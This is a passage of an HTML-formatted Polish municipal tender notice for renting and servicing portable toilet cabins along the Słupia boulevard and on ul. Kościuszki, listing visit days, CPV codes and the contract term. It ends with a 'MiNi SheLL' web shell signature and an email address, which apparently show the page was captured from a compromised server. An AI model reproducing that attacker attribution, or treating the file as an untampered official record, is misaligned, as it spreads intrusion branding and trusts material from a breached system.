3. Serwis kabin wymienionych w zadaniu 2 musi odbywać się w miesiącach czerwcu i wrześniu dwa razy w tygodniu, w poniedziałki i piątki, oraz w miesiącach lipcu i sierpniu trzy razy w tygodniu, w poniedziałki, środy i piątki. Serwisy winny odbywać się rano między godziną 8:00 a godziną 10:00.
4. Po tym terminie, każdego roku obowiązywania umowy kabiny należy usunąć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych zlokalizowanych na bulwarze im. Bł. Ks. Jerzego Popiełuszki przy rzece Słupi zlokalizowanego od ul. Kilińskiego wzdłuż ul. Francesco Nullo do ul. Mostnika i skwerze przy ul. Kościuszki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis zadania 3:
1. W okresie od dnia 01 stycznia do 31 stycznia każdego roku trwania umowy dwie przenośne kabiny sanitarne należy ustawić we wskazanych przez Zamawiającego miejscach tj.:
1) jedną przenośną kabinę sanitarną na terenie bulwaru im. Bł. ks. Jerzego Popiełuszki przy rzece Słupi od strony Baszty Czarownic,
2) jedną przenośną kabiną sanitarną na skwerze przy ul. Kościuszki.
2. Liczba niezbędnych serwisów przez cały okres obowiązywania umowy wynosi 54.
3. Serwis kabin wymienionych w zadaniu 3 musi odbywać się dwa razy w tygodniu, w poniedziałki               i piątki. Serwisy winny odbywać się rano między godziną 8:00 a godziną 10:00.
4. Po tym terminie, każdego roku obowiązywania umowy kabiny należy usunąć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com